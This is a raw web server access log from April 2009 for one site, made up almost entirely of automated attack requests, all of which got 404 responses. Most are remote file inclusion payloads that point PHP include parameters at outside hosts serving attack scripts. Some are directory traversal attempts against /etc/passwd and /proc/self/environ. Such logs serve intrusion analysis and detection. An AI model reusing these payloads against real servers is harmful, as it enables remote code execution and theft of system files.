85.214.37.11 - - [28/Apr/2009:11:16:31 -0700] "GET /logs/access_080228.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.52.45.250 - - [28/Apr/2009:11:16:53 -0700] "GET /blog/ HTTP/1.1" 200 43160 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:16:57 -0700] "GET /logs/access_071214.log//_head.php?_zb_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:16:58 -0700] "GET /_head.php?_zb_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:16:58 -0700] "GET /logs//_head.php?_zb_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:16:58 -0700] "GET /logs/access_071214.log//_head.php?_zb_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:16:59 -0700] "GET /_head.php?_zb_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:16:59 -0700] "GET /logs//_head.php?_zb_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:17:13 -0700] "GET /logs/access_090114.log//pollphp/db//booth.php?include_path=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:17:14 -0700] "GET /logs/access_090114.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
80.93.54.77 - - [28/Apr/2009:11:17:14 -0700] "GET /logs/access_090315.log//admin.php?include_path=http://onlin3.freehostia.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:17:14 -0700] "GET /logs/access_090114.log//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
80.93.54.77 - - [28/Apr/2009:11:17:15 -0700] "GET /admin.php?include_path=http://onlin3.freehostia.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:17:15 -0700] "GET /logs/access_090114.log//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 275 "-" "XXXXXX" "www.dmulk.com"
80.93.54.77 - - [28/Apr/2009:11:17:15 -0700] "GET /logs//admin.php?include_path=http://onlin3.freehostia.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:17:36 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:17:36 -0700] "GET /logs/access_081231.log%20%20/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:17:36 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.54.77 - - [28/Apr/2009:11:17:36 -0700] "GET /logs/access_090126.log//admin.php?include_path=http://onlin3.freehostia.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:17:56 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:17:57 -0700] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:17:57 -0700] "GET /logs/access_080304.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:17:58 -0700] "GET /logs/access_080606.log%20%20/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:18:00 -0700] "GET /logs/access_080323.log/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:18:00 -0700] "GET /logs/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:18:00 -0700] "GET /file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.1.205.86 - - [28/Apr/2009:11:18:02 -0700] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
62.1.205.86 - - [28/Apr/2009:11:18:02 -0700] "GET /logs///chat/inc/cmses/aedating4CMS.php?dir[inc]=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
62.1.205.86 - - [28/Apr/2009:11:18:02 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.suburbane.org//cgi-bin.old? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
62.1.205.86 - - [28/Apr/2009:11:18:02 -0700] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.suburbane.org//cgi-bin.old? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:18:04 -0700] "GET /logs/access_090226.log/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:11:18:07 -0700] "GET /logs/access_071122.log/inc/cmses/aedatingCMS.php?dir[inc]=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:07 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:08 -0700] "GET /logs/access_080304.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:08 -0700] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:17 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:17 -0700] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:17 -0700] "GET /logs/access_080304.log%20%20/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:19 -0700] "GET /logs/access_080209.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.247.73.248 - - [28/Apr/2009:11:18:20 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.247.73.248 - - [28/Apr/2009:11:18:20 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.247.73.248 - - [28/Apr/2009:11:18:20 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:11:18:21 -0700] "GET /logs/access_071123.log/inc/cmses/aedatingCMS.php?dir[inc]=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:28 -0700] "GET /logs/access_080209.log%20%20/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.247.73.248 - - [28/Apr/2009:11:18:36 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:46 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:47 -0700] "GET /logs/access_080304.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:18:48 -0700] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.22.204.193 - - [28/Apr/2009:11:19:00 -0700] "GET /logs/access_080401.log//include/write.php?dir=http://91.203.132.162/.q/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [28/Apr/2009:11:19:00 -0700] "GET /include/write.php?dir=http://91.203.132.162/.q/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [28/Apr/2009:11:19:00 -0700] "GET /logs//include/write.php?dir=http://91.203.132.162/.q/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:19:01 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:19:01 -0700] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:19:01 -0700] "GET /logs/access_080304.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:19:16 -0700] "GET /logs/access_080304.log%20%20/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:19:16 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:19:18 -0700] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:19:20 -0700] "GET /logs/access_080209.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:19:29 -0700] "GET /logs/access_080209.log%20%20/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:11:20:10 -0700] "GET /logs/access_081124.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:11:20:10 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:11:20:10 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:11:20:10 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:20:16 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:20:16 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:20:16 -0700] "GET /logs/access_080808.log/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:11:20:16 -0700] "GET /logs/access_081119.log//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:20:16 -0700] "GET /logs/access_081231.log/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:20:21 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:20:21 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:20:21 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:20:32 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:20:32 -0700] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:20:32 -0700] "GET /logs/access_080304.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:20:34 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:20:34 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:20:35 -0700] "GET /logs/access_080622.log%20%20/admincp/auth/checklogin.php?cfgProgDir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:20:38 -0700] "GET /logs/access_080623.log%20%20/admincp/auth/checklogin.php?cfgProgDir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:20:48 -0700] "GET /logs/access_080209.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:21:00 -0700] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:21:02 -0700] "GET /logs/access_080304.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:21:02 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:21:04 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:11:21:05 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:11:21:05 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:11:21:06 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:21:22 -0700] "GET /logs/access_080209.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:11:21:34 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:21:40 -0700] "GET /logs/access_080424.log%20%20/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.79.146 - - [28/Apr/2009:11:21:40 -0700] "GET /logs/access_080215.log%20%20/file_upload.php?sbp=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:11:21:42 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:22:07 -0700] "GET /logs/access_080120.log%20%20/akocomments.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [28/Apr/2009:11:22:07 -0700] "GET /logs/access_080128.log%20%20/akocomments.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.247.73.248 - - [28/Apr/2009:11:22:12 -0700] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.36 - - [28/Apr/2009:11:22:19 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
80.247.73.248 - - [28/Apr/2009:11:22:26 -0700] "GET /logs/access_081107.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.36 - - [28/Apr/2009:11:22:34 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:11:22:46 -0700] "GET /logs/access_081207.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:11:22:46 -0700] "GET /logs/access_080228.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.134.10.54 - - [28/Apr/2009:11:22:53 -0700] "GET //skin/zero_vote/error.php?%20dir=http://xplcc.t35.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.134.10.54 - - [28/Apr/2009:11:22:53 -0700] "GET /logs///skin/zero_vote/error.php?%20dir=http://xplcc.t35.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.134.10.54 - - [28/Apr/2009:11:22:53 -0700] "GET /logs/access_071214.log%20%20///skin/zero_vote/error.php?%20dir=http://xplcc.t35.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:22:56 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:22:57 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:22:58 -0700] "GET /logs/access_071122.log%20%20/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.208.16.30 - - [28/Apr/2009:11:23:01 -0700] "GET / HTTP/1.1" 500 292 "-" "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:23:03 -0700] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:23:03 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:23:03 -0700] "GET /logs/access_090322.log%20%20///include/print_category.php?setup[use_category]=1&dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:23:03 -0700] "GET /logs/access_080331.log//_head.php?_zb_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:23:07 -0700] "GET /logs/access_081124.log%20%20///include/print_category.php?setup[use_category]=1&dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:23:14 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:23:14 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [28/Apr/2009:11:23:14 -0700] "GET /logs/access_071122.log%20%20/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
